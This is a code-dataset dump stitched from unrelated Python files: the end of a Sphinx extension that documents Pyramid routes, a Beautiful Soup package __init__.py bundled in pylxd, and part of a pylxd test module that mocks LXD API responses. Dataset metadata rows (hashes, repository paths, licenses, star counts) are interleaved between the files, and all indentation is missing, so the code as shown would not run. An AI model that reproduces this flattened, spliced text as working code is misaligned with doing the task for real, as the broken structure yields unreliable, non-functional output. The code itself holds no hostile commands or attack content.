for objnode in node.traverse(addnodes.desc):
if objnode.get('domain') != 'http':
continue
for signode in objnode:
if not isinstance(signode, addnodes.desc_signature):
continue
method = signode.get('method')
path = signode.get('path')
mapped_route = routes.get((method, path))
if not method or not path or not mapped_route:
continue
xref_node = self._make_view_source_xref(mapped_route)
if not xref_node:
continue
xref_node += nodes.inline('', '[source]',
classes=['viewcode-link'])
source_node = addnodes.only(expr='html')
source_node += xref_node
signode += source_node
return node.children
def make_custom_rst(self, mapped_routes):
custom_nodes = []
for mapped_route in mapped_routes:
env = self.state.document.settings.env
route_id = "route-%d" % env.new_serialno('route')
route_node = nodes.section(ids=[route_id])
title = mapped_route['pattern']
route_node += nodes.title(text=title)
real_table = nodes.table('')
group = nodes.tgroup('', cols=2)
real_table += group
group += nodes.colspec('', colwidth=10)
group += nodes.colspec('', colwidth=90)
body = nodes.tbody('')
group += body
def get_row(*column_texts):
row = nodes.row('')
for text in column_texts:
if isinstance(text, string_types):
text_node = nodes.Text(text)
else:
text_node = text
node = nodes.paragraph('', '', text_node)
row += nodes.entry('', node)
return row
view_node = self._make_view_source_xref(mapped_route)
if view_node:
view_node += nodes.Text(mapped_route['view'])
else:
view_node = mapped_route['view']
body += get_row('Module', view_node)
body += get_row('Request Method', mapped_route['method'])
body += get_row('Route Name', mapped_route['name'])
route_node.append(real_table)
if mapped_route['docs']:
route_node += rst2node(
mapped_route['view'], mapped_route['docs']
)
custom_nodes.append(route_node)
return custom_nodes
def _make_view_source_xref(self, mapped_route):
if 'link-code' not in self.options or \
not mapped_route['view_callable'] or \
not mapped_route['view_module'] or \
not mapped_route['source_lines']:
return
env = self.state.document.settings.env
link_code_pattern = self.options.get('link-code-pattern')
if link_code_pattern:
filepath = mapped_route['view_module'].replace('.', '/') + '.py'
uri = link_code_pattern.format(
file=filepath,
lineno_start=mapped_route['source_lines'][0],
lineno_end=mapped_route['source_lines'][1],
)
xref_node = nodes.reference('', '', internal=False, refuri=uri)
else:
if 'sphinx.ext.viewcode' not in env.config.extensions:
return
source_page = (
'_modules/' + mapped_route['view_module'].replace('.', '/'))
xref_node = addnodes.pending_xref(
'', reftype='viewcode', refdomain='std', refexplicit=False,
reftarget=source_page,
refid=mapped_route['view_callable'],
refdoc=env.docname)
return xref_node
def run(self):
ini_file = self.arguments[0]
fmt = self.options.get('format', 'custom')
path_blacklist = self.options.get('skip-path', '').split() or None
path_whitelist = self.options.get('match-path', '').split() or None
module_blacklist = self.options.get('skip-module', '').split() or None
module_whitelist = self.options.get('match-module', '').split() or None
routes = self.get_routes(
ini_file,
path_blacklist=path_blacklist,
path_whitelist=path_whitelist,
module_blacklist=module_blacklist,
module_whitelist=module_whitelist,
)
if fmt == 'custom':
return self.make_custom_rst(routes)
elif fmt == 'httpdomain':
return self.make_httpdomain_rst(routes)
else:
raise Exception('Unsupported format %s' % fmt)
def trim(docstring):
"""
Remove the tabs to spaces, and remove the extra spaces / tabs that are in
front of the text in docstrings.
Implementation taken from http://www.python.org/dev/peps/pep-0257/
"""
if not docstring:
return ''
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
res = '\n'.join(trimmed)
if not PY3 and not isinstance(res, unicode):
res = res.decode('utf8')
return res
class Env(object):
temp_data = {}
docname = ''
def rst2node(doc_name, data):
"""Converts a reStructuredText into its node
"""
if not data:
return
parser = docutils.parsers.rst.Parser()
document = docutils.utils.new_document('<%s>' % doc_name)
document.settings = docutils.frontend.OptionParser().get_default_values()
document.settings.tab_width = 4
document.settings.pep_references = False
document.settings.rfc_references = False
document.settings.env = Env()
parser.parse(data, document)
if len(document.children) == 1:
return document.children[0]
else:
par = docutils.nodes.paragraph()
for child in document.children:
par += child
return par
def setup(app):
"""Hook the directives when Sphinx ask for it."""
app.setup_extension('sphinxcontrib.httpdomain')
app.add_directive('autopyramid', RouteDirective)
| 32.887574
| 79
| 0.574307
|
4a159b9a6ef32abab9b6c2226c8757dec82b701c
| 15,056
|
py
|
Python
|
pylinkvalidator/included/bs4/__init__.py
|
airsource/pylinkvalidator
|
5a52fea64ecdb867a3390a97c023765265d88d23
|
[
"MIT"
] | 127
|
2015-07-06T03:19:23.000Z
|
2022-03-14T18:34:11.000Z
|
pylinkvalidator/included/bs4/__init__.py
|
airsource/pylinkvalidator
|
5a52fea64ecdb867a3390a97c023765265d88d23
|
[
"MIT"
] | 32
|
2015-07-06T03:18:46.000Z
|
2020-12-14T13:14:23.000Z
|
pylinkvalidator/included/bs4/__init__.py
|
airsource/pylinkvalidator
|
5a52fea64ecdb867a3390a97c023765265d88d23
|
[
"MIT"
] | 36
|
2015-08-06T18:44:53.000Z
|
2022-01-09T12:38:29.000Z
|
"""Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup uses a pluggable XML or HTML parser to parse a
(possibly invalid) document into a tree representation. Beautiful Soup
provides provides methods and Pythonic idioms that make it easy to
navigate, search, and modify the parse tree.
Beautiful Soup works with Python 2.6 and up. It works better if lxml
and/or html5lib is installed.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/bs4/doc/
"""
from __future__ import absolute_import
import sys
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "4.2.1"
__copyright__ = "Copyright (c) 2004-2013 Leonard Richardson"
__license__ = "MIT"
use_system_version = False
try:
# The system-installed version has priority providing it is not an
# earlier version. The embedded bs4 only works for Python 2.
import bs4
if (bs4.__version__.split('.') >= __version__.split('.')) or\
sys.version_info[0] >= 3:
from bs4 import *
# Necessary for direct import in pylinkvalidator
UnicodeDammit = bs4.UnicodeDammit
use_system_version = True
# Make sure we copy over the version. See #17071
__version__ = bs4.__version__
except ImportError:
if sys.version_info[0] >= 3:
raise
if not use_system_version:
__all__ = ['BeautifulSoup']
import re
import warnings
from .builder import builder_registry
from .dammit import UnicodeDammit
from .element import (
CData,
Comment,
DEFAULT_OUTPUT_ENCODING,
Declaration,
Doctype,
NavigableString,
PageElement,
ProcessingInstruction,
ResultSet,
SoupStrainer,
Tag,
)
# The very first thing we do is give a useful error if someone is
# running this code under Python 3 without converting it.
syntax_error = u'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work. You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
class BeautifulSoup(Tag):
"""
This class defines the basic interface called by the tree builders.
These methods will be called by the parser:
reset()
feed(markup)
The tree builder may call these methods from its feed() implementation:
handle_starttag(name, attrs) # See note about return value
handle_endtag(name)
handle_data(data) # Appends to the current data node
endData(containerClass=NavigableString) # Ends the current data node
No matter how complicated the underlying parser is, you should be
able to build a tree using 'start tag' events, 'end tag' events,
'data' events, and "done with data" events.
If you encounter an empty-element tag (aka a self-closing tag,
like HTML's <br> tag), call handle_starttag and then
handle_endtag.
"""
ROOT_TAG_NAME = u'[document]'
# If the end-user gives no indication which tree builder they
# want, look for one with these features.
DEFAULT_BUILDER_FEATURES = ['html', 'fast']
# Used when determining whether a text node is all whitespace and
# can be replaced with a single space. A text node that contains
# fancy Unicode spaces (usually non-breaking) should be left
# alone.
STRIP_ASCII_SPACES = {9: None, 10: None, 12: None, 13: None, 32: None, }
def __init__(self, markup="", features=None, builder=None,
parse_only=None, from_encoding=None, **kwargs):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser."""
if 'convertEntities' in kwargs:
warnings.warn(
"BS4 does not respect the convertEntities argument to the "
"BeautifulSoup constructor. Entities are always converted "
"to Unicode characters.")
if 'markupMassage' in kwargs:
del kwargs['markupMassage']
warnings.warn(
"BS4 does not respect the markupMassage argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for any necessary markup massage.")
if 'smartQuotesTo' in kwargs:
del kwargs['smartQuotesTo']
warnings.warn(
"BS4 does not respect the smartQuotesTo argument to the "
"BeautifulSoup constructor. Smart quotes are always converted "
"to Unicode characters.")
if 'selfClosingTags' in kwargs:
del kwargs['selfClosingTags']
warnings.warn(
"BS4 does not respect the selfClosingTags argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for understanding self-closing tags.")
if 'isHTML' in kwargs:
del kwargs['isHTML']
warnings.warn(
"BS4 does not respect the isHTML argument to the "
"BeautifulSoup constructor. You can pass in features='html' "
"or features='xml' to get a builder capable of handling "
"one or the other.")
def deprecated_argument(old_name, new_name):
if old_name in kwargs:
warnings.warn(
'The "%s" argument to the BeautifulSoup constructor '
'has been renamed to "%s."' % (old_name, new_name))
value = kwargs[old_name]
del kwargs[old_name]
return value
return None
parse_only = parse_only or deprecated_argument(
"parseOnlyThese", "parse_only")
from_encoding = from_encoding or deprecated_argument(
"fromEncoding", "from_encoding")
if len(kwargs) > 0:
arg = kwargs.keys().pop()
raise TypeError(
"__init__() got an unexpected keyword argument '%s'" % arg)
if builder is None:
if isinstance(features, basestring):
features = [features]
if features is None or len(features) == 0:
features = self.DEFAULT_BUILDER_FEATURES
builder_class = builder_registry.lookup(*features)
if builder_class is None:
raise FeatureNotFound(
"Couldn't find a tree builder with the features you "
"requested: %s. Do you need to install a parser library?"
% ",".join(features))
builder = builder_class()
self.builder = builder
self.is_xml = builder.is_xml
self.builder.soup = self
self.parse_only = parse_only
self.reset()
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
(self.markup, self.original_encoding, self.declared_html_encoding,
self.contains_replacement_characters) = (
self.builder.prepare_markup(markup, from_encoding))
try:
self._feed()
except StopParsing:
pass
# Clear out the markup and remove the builder's circular
# reference to this object.
self.markup = None
self.builder.soup = None
def _feed(self):
# Convert the document to Unicode.
self.builder.reset()
self.builder.feed(self.markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def reset(self):
Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
self.hidden = 1
self.builder.reset()
self.currentData = []
self.currentTag = None
self.tagStack = []
self.pushTag(self)
def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
"""Create a new tag associated with this soup."""
return Tag(None, self.builder, name, namespace, nsprefix, attrs)
def new_string(self, s, subclass=NavigableString):
"""Create a new NavigableString associated with this soup."""
navigable = subclass(s)
navigable.setup()
return navigable
def insert_before(self, successor):
raise NotImplementedError("BeautifulSoup objects don't support insert_before().")
def insert_after(self, successor):
raise NotImplementedError("BeautifulSoup objects don't support insert_after().")
def popTag(self):
tag = self.tagStack.pop()
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.contents.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
def endData(self, containerClass=NavigableString):
if self.currentData:
currentData = u''.join(self.currentData)
if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and
not set([tag.name for tag in self.tagStack]).intersection(
self.builder.preserve_whitespace_tags)):
if '\n' in currentData:
currentData = '\n'
else:
currentData = ' '
self.currentData = []
if self.parse_only and len(self.tagStack) <= 1 and \
(not self.parse_only.text or \
not self.parse_only.search(currentData)):
return
o = containerClass(currentData)
self.object_was_parsed(o)
def object_was_parsed(self, o, parent=None, most_recent_element=None):
"""Add an object to the parse tree."""
parent = parent or self.currentTag
most_recent_element = most_recent_element or self._most_recent_element
o.setup(parent, most_recent_element)
if most_recent_element is not None:
most_recent_element.next_element = o
self._most_recent_element = o
parent.contents.append(o)
def _popToTag(self, name, nsprefix=None, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instqance of
the given tag."""
#print "Popping to %s" % name
if name == self.ROOT_TAG_NAME:
return
numPops = 0
mostRecentTag = None
for i in range(len(self.tagStack) - 1, 0, -1):
if (name == self.tagStack[i].name
and nsprefix == self.tagStack[i].prefix):
numPops = len(self.tagStack) - i
break
if not inclusivePop:
numPops = numPops - 1
for i in range(0, numPops):
mostRecentTag = self.popTag()
return mostRecentTag
def handle_starttag(self, name, namespace, nsprefix, attrs):
"""Push a start tag on to the stack.
If this method returns None, the tag was rejected by the
SoupStrainer. You should proceed as if the tag had not occured
in the document. For instance, if this was a self-closing tag,
don't call handle_endtag.
"""
# print "Start tag %s: %s" % (name, attrs)
self.endData()
if (self.parse_only and len(self.tagStack) <= 1
and (self.parse_only.text
or not self.parse_only.search_tag(name, attrs))):
return None
tag = Tag(self, self.builder, name, namespace, nsprefix, attrs,
self.currentTag, self._most_recent_element)
if tag is None:
return tag
if self._most_recent_element:
self._most_recent_element.next_element = tag
self._most_recent_element = tag
self.pushTag(tag)
return tag
def handle_endtag(self, name, nsprefix=None):
#print "End tag: " + name
self.endData()
self._popToTag(name, nsprefix)
def handle_data(self, data):
self.currentData.append(data)
def decode(self, pretty_print=False,
eventual_encoding=DEFAULT_OUTPUT_ENCODING,
formatter="minimal"):
"""Returns a string or Unicode representation of this document.
To get Unicode, pass None for encoding."""
if self.is_xml:
# Print the XML declaration
encoding_part = ''
if eventual_encoding != None:
encoding_part = ' encoding="%s"' % eventual_encoding
prefix = u'<?xml version="1.0"%s?>\n' % encoding_part
else:
prefix = u''
if not pretty_print:
indent_level = None
else:
indent_level = 0
return prefix + super(BeautifulSoup, self).decode(
indent_level, eventual_encoding, formatter)
# Alias to make it easier to type import: 'from bs4 import _soup'
_s = BeautifulSoup
_soup = BeautifulSoup
class BeautifulStoneSoup(BeautifulSoup):
"""Deprecated interface to an XML parser."""
def __init__(self, *args, **kwargs):
kwargs['features'] = 'xml'
warnings.warn(
'The BeautifulStoneSoup class is deprecated. Instead of using '
'it, pass features="xml" into the BeautifulSoup constructor.')
super(BeautifulStoneSoup, self).__init__(*args, **kwargs)
class StopParsing(Exception):
pass
class FeatureNotFound(ValueError):
pass
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin)
print(soup.prettify())
| 38.506394
| 236
| 0.577378
|
4a159c7c8e03ac2eb75917f26c9e8af6b26ad772
| 73
|
py
|
Python
|
variables/prodna/__init__.py
|
rohithasrk-bidgely/cloudformation-config-generation
|
d72d362c77b220169b3ccdd0b4a921910f7172ff
|
[
"MIT"
] | null | null | null |
variables/prodna/__init__.py
|
rohithasrk-bidgely/cloudformation-config-generation
|
d72d362c77b220169b3ccdd0b4a921910f7172ff
|
[
"MIT"
] | 9
|
2018-07-09T08:46:12.000Z
|
2018-07-18T09:13:03.000Z
|
variables/uat/__init__.py
|
rohithasrk-bidgely/cloudformation-config-generation
|
d72d362c77b220169b3ccdd0b4a921910f7172ff
|
[
"MIT"
] | null | null | null |
from .alarms import *
from .variables import *
from .components import *
| 18.25
| 25
| 0.753425
|
4a159c85bface6caa59de79899ee31ba519f4e35
| 939
|
py
|
Python
|
test-framework/test-suites/integration/tests/add/test_add_host_storage_partition.py
|
kmcm0/stacki
|
eb9dff1b45d5725b4986e567876bf61707fec28f
|
[
"BSD-3-Clause"
] | 123
|
2015-05-12T23:36:45.000Z
|
2017-07-05T23:26:57.000Z
|
test-framework/test-suites/integration/tests/add/test_add_host_storage_partition.py
|
kmcm0/stacki
|
eb9dff1b45d5725b4986e567876bf61707fec28f
|
[
"BSD-3-Clause"
] | 177
|
2015-06-05T19:17:47.000Z
|
2017-07-07T17:57:24.000Z
|
test-framework/test-suites/integration/tests/add/test_add_host_storage_partition.py
|
kmcm0/stacki
|
eb9dff1b45d5725b4986e567876bf61707fec28f
|
[
"BSD-3-Clause"
] | 32
|
2015-06-07T02:25:03.000Z
|
2017-06-23T07:35:35.000Z
|
import json
from textwrap import dedent
class TestAddHostStoragePartition:
def test_no_args(self, host):
result = host.run('stack add host storage partition')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "host" argument is required
{host ...} {device=string} {size=integer} [mountpoint=string] [options=string] [partid=integer] [type=string]
''')
def test_all_params(self, host, add_host):
result = host.run(
'stack add host storage partition backend-0-0 device=sda mountpoint=/ '
'size=1024 type=ext4 options=test_options partid=1'
)
assert result.rc == 0
result = host.run('stack list host storage partition backend-0-0 output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [{
"host": "backend-0-0",
"device": "sda",
"partid": 1,
"mountpoint": "/",
"size": 1024,
"fstype": "ext4",
"options": "test_options",
"source": "H"
}]
| 28.454545
| 112
| 0.669862
|
4a159cdb863f3c2858a164495f57265fbd256df6
| 2,514
|
py
|
Python
|
torch/package/_file_structure_representation.py
|
vladap2013/pytorch
|
30367773056de95e006107d82ddaa3db5eeaa05a
|
[
"Intel"
] | 1
|
2021-06-17T13:02:45.000Z
|
2021-06-17T13:02:45.000Z
|
torch/package/_file_structure_representation.py
|
vladap2013/pytorch
|
30367773056de95e006107d82ddaa3db5eeaa05a
|
[
"Intel"
] | null | null | null |
torch/package/_file_structure_representation.py
|
vladap2013/pytorch
|
30367773056de95e006107d82ddaa3db5eeaa05a
|
[
"Intel"
] | null | null | null |
from typing import Dict, List
from ._glob_group import GlobPattern, _GlobGroup
class Folder:
def __init__(self, name: str, is_dir: bool):
self.name = name
self.is_dir = is_dir
self.children: Dict[str, Folder] = {}
def get_folder(self, folders: List[str]):
# builds path of folders if not yet built, returns last folder
if len(folders) == 0:
return self
folder_name = folders[0]
if folder_name not in self.children:
self.children[folder_name] = Folder(folder_name, True)
return self.children[folder_name].get_folder(folders[1:])
def add_file(self, file_path):
*folders, file = file_path.split("/")
folder = self.get_folder(folders)
folder.children[file] = Folder(file, False)
def __str__(self):
str_list: List[str] = []
self.stringify_tree(str_list)
return "".join(str_list)
def stringify_tree(
self, str_list: List[str], preamble: str = "", folder_ptr: str = "─── "
):
space = " "
branch = "│ "
tee = "├── "
last = "└── "
# add this folder's representation
str_list.append(f"{preamble}{folder_ptr}{self.name}\n")
# add folder's children representations
if folder_ptr == tee:
preamble = preamble + branch
else:
preamble = preamble + space
file_keys: List[str] = []
dir_keys: List[str] = []
for key, val in self.children.items():
if val.is_dir:
dir_keys.append(key)
else:
file_keys.append(key)
for index, key in enumerate(sorted(dir_keys)):
if (index == len(dir_keys) - 1) and len(file_keys) == 0:
self.children[key].stringify_tree(str_list, preamble, last)
else:
self.children[key].stringify_tree(str_list, preamble, tee)
for index, file in enumerate(sorted(file_keys)):
pointer = last if (index == len(file_keys) - 1) else tee
str_list.append(f"{preamble}{pointer}{file}\n")
def _create_folder_from_file_list(
filename: str,
file_list: List[str],
include: "GlobPattern" = "**",
exclude: "GlobPattern" = (),
) -> Folder:
glob_pattern = _GlobGroup(include, exclude, "/")
top_folder = Folder(filename, True)
for file in file_list:
if glob_pattern.matches(file):
top_folder.add_file(file)
return top_folder
| 31.822785
| 79
| 0.58393
|
4a159d561b6ac457c93509b276e83b469b8ca496
| 766
|
py
|
Python
|
setup.py
|
kurgm/gwv
|
1a5cd57481c6312ebbb9a99e45b302f82a5e0e92
|
[
"MIT"
] | 1
|
2020-01-16T16:56:00.000Z
|
2020-01-16T16:56:00.000Z
|
setup.py
|
kurgm/gwv
|
1a5cd57481c6312ebbb9a99e45b302f82a5e0e92
|
[
"MIT"
] | 3
|
2017-12-21T13:30:25.000Z
|
2020-03-12T14:46:07.000Z
|
setup.py
|
kurgm/gwv
|
1a5cd57481c6312ebbb9a99e45b302f82a5e0e92
|
[
"MIT"
] | null | null | null |
from distutils.command.build import build
from setuptools import find_packages
from setuptools import setup
from gwv import __version__
class my_build(build):
def _pre_build(self):
import bdat
bdat.main()
def run(self):
self._pre_build()
build.run(self)
setup(
name="gwv",
version=__version__,
packages=find_packages(exclude=[
"*.tests", "*.tests.*", "tests.*", "tests",
"*.bdat", "*.bdat.*", "bdat.*", "bdat"
]),
install_requires=[
"pyyaml",
],
entry_points={
"console_scripts": [
"gwv = gwv.gwv:main"
]
},
cmdclass={'build': my_build},
package_data={
"gwv": ["data/*", "data/3rd/*"],
},
test_suite="tests",
)
| 19.15
| 51
| 0.55483
|
4a159dd05c9b321fa7b6e82f2c2dee8ae9f495ae
| 1,902
|
py
|
Python
|
GameDriver.py
|
m4rquee/ai-dino
|
0d1be7676246166c25c5b52554724766ea0e96a9
|
[
"MIT"
] | 1
|
2019-02-15T15:57:04.000Z
|
2019-02-15T15:57:04.000Z
|
GameDriver.py
|
m4rquee/ai-dino
|
0d1be7676246166c25c5b52554724766ea0e96a9
|
[
"MIT"
] | null | null | null |
GameDriver.py
|
m4rquee/ai-dino
|
0d1be7676246166c25c5b52554724766ea0e96a9
|
[
"MIT"
] | null | null | null |
import time
import pyscreenshot as ImageGrab
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
class GameDriver(webdriver.Chrome):
def __init__(self, executable_path='./chromedriver'):
self.keys = [Keys.ARROW_UP, Keys.ARROW_DOWN, Keys.NULL]
self.chrome_options = webdriver.ChromeOptions()
# self.chrome_options.add_argument('--headless')
self.chrome_options.add_argument('--no-sandbox')
self.chrome_options.add_argument('--mute-audio')
self.chrome_options.add_argument('--disable-infobars')
self.chrome_options.add_argument('--disable-extensions')
self.chrome_options.add_argument('--window-size=720,480')
super().__init__(executable_path, options=self.chrome_options)
self.actions = webdriver.ActionChains(self)
self.get('https://chromedino.com/') # The default url doesn't work with headless
def init(self):
self.send_key()
time.sleep(0.5)
def get_game_prop(self, prop):
return self.execute_script('return Runner.instance_["%s"]' % prop)
def get_score(self):
return self.get_game_prop('distanceRan')
def restart(self):
self.execute_script('Runner.instance_.restart()')
time.sleep(3)
def send_key(self, key=Keys.ARROW_UP):
self.actions.send_keys(key)
self.actions.perform()
def take_screenshot(self):
return ImageGrab.grab(bbox=(10, 10, 510, 510))
def take_n_screenshot(self, n=4):
for _ in range(n):
yield self.take_screenshot()
time.sleep(0.1)
def run_loop(self):
time.sleep(1)
self.restart()
key = Keys.ARROW_UP
while not self.get_game_prop('playing'):
self.send_key(key)
key = yield self.take_n_screenshot()
yield
| 32.237288
| 89
| 0.659306
|
4a159dfdab315b704764997a7b5592735df9c44e
| 34,803
|
py
|
Python
|
pylxd/tests/mock_lxd.py
|
surfernsk/pylxd
|
8f641f2381f10b671854899da909a459485e57c3
|
[
"Apache-2.0"
] | 247
|
2015-05-26T21:39:38.000Z
|
2022-03-23T23:56:12.000Z
|
pylxd/tests/mock_lxd.py
|
surfernsk/pylxd
|
8f641f2381f10b671854899da909a459485e57c3
|
[
"Apache-2.0"
] | 417
|
2015-05-31T12:57:55.000Z
|
2022-03-28T14:35:09.000Z
|
pylxd/tests/mock_lxd.py
|
surfernsk/pylxd
|
8f641f2381f10b671854899da909a459485e57c3
|
[
"Apache-2.0"
] | 170
|
2015-05-31T11:10:59.000Z
|
2022-01-18T01:36:17.000Z
|
import json
def instances_POST(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)
def instance_POST(request, context):
context.status_code = 202
if not request.json().get("migration", False):
return {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
else:
return {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
"metadata": {
"metadata": {
"0": "abc",
"1": "def",
"control": "ghi",
}
},
}
def instance_PUT(request, context):
context.status_code = 202
return {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
def instance_DELETE(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)
def images_POST(request, context):
context.status_code = 202
return json.dumps(
{
"type": "async",
"operation": "/1.0/operations/images-create-operation?project=default",
}
)
def image_DELETE(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)
def networks_GET(request, _):
name = request.path.split("/")[-1]
return json.dumps(
{
"type": "sync",
"metadata": {
"config": {
"ipv4.address": "10.80.100.1/24",
"ipv4.nat": "true",
"ipv6.address": "none",
"ipv6.nat": "false",
},
"name": name,
"description": "Network description",
"type": "bridge",
"managed": True,
"used_by": [],
},
}
)
def networks_POST(_, context):
context.status_code = 200
return json.dumps({"type": "sync", "metadata": {}})
def networks_DELETE(_, context):
context.status_code = 202
return json.dumps(
{"type": "sync", "operation": "/1.0/operations/operation-abc?project=default"}
)
def profile_GET(request, context):
name = request.path.split("/")[-1]
return json.dumps(
{
"type": "sync",
"metadata": {
"name": name,
"description": "An description",
"config": {},
"devices": {},
"used_by": [],
},
}
)
def profiles_POST(request, context):
context.status_code = 200
return json.dumps({"type": "sync", "metadata": {}})
def profile_DELETE(request, context):
context.status_code = 200
return json.dumps(
{"type": "sync", "operation": "/1.0/operations/operation-abc?project=default"}
)
def projects_GET(request, context):
name = request.path.split("/")[-1]
return json.dumps(
{
"type": "sync",
"metadata": {
"name": name,
"description": "new project is new",
"config": {
"features.images": "true",
},
"used_by": [],
},
}
)
def projects_POST(request, context):
context.status_code = 200
return json.dumps({"type": "sync", "metadata": {}})
def snapshot_DELETE(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)
RULES = [
# General service endpoints
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"auth": "trusted",
"environment": {
"certificate": "an-pem-cert",
},
"api_extensions": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"auth": "trusted",
"environment": {},
"api_extensions": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0$",
},
# Certificates
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/certificates/an-certificate",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates$",
},
{
"method": "POST",
"url": r"^http://pylxd.test/1.0/certificates$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"certificate": "certificate-content",
"fingerprint": "eaf55b72fc23aa516d709271df9b0116064bf8cfa009cf34c67c33ad32c2320c",
"type": "client",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates/eaf55b72fc23aa516d709271df9b0116064bf8cfa009cf34c67c33ad32c2320c$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"certificate": "certificate-content",
"fingerprint": "an-certificate",
"type": "client",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates/an-certificate$",
},
{
"json": {
"type": "sync",
"metadata": {},
},
"status_code": 202,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/certificates/an-certificate$",
},
# Cluster
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"server_name": "an-member",
"enabled": "true",
"member_config": [
{
"entity": "storage-pool",
"name": "local",
"key": "source",
"value": "",
"description": '"source" property for storage pool "local"',
},
{
"entity": "storage-pool",
"name": "local",
"key": "volatile.initial_source",
"value": "",
"description": '"volatile.initial_source" property for'
' storage pool "local"',
},
],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster$",
},
# Cluster Members
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/certificates/an-member",
"http://pylxd.test/1.0/certificates/nd-member",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster/members$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"server_name": "an-member",
"url": "https://10.1.1.101:8443",
"database": "false",
"status": "Online",
"message": "fully operational",
"architecture": "x86_64",
"description": "AMD Epyc 32c/64t",
"failure_domain": "rack1",
"roles": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster/members/an-member$",
},
# cluster-certificate
{
"text": json.dumps({"type": "sync", "status": "Success", "status_code": 200}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/cluster/certificate$",
},
# Instances
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/instances/an-instance",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd2.test/1.0/instances/an-instance",
],
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd2.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances\?target=an-remote",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"devices": {"root": {"path": "/", "type": "disk"}},
"ephemeral": True,
"expanded_config": {
"security.privileged": "true",
},
"expanded_devices": {
"eth0": {
"name": "eth0",
"nictype": "bridged",
"parent": "lxdbr0",
"type": "nic",
},
"root": {"path": "/", "type": "disk"},
},
"profiles": ["default"],
"stateful": False,
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd2.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
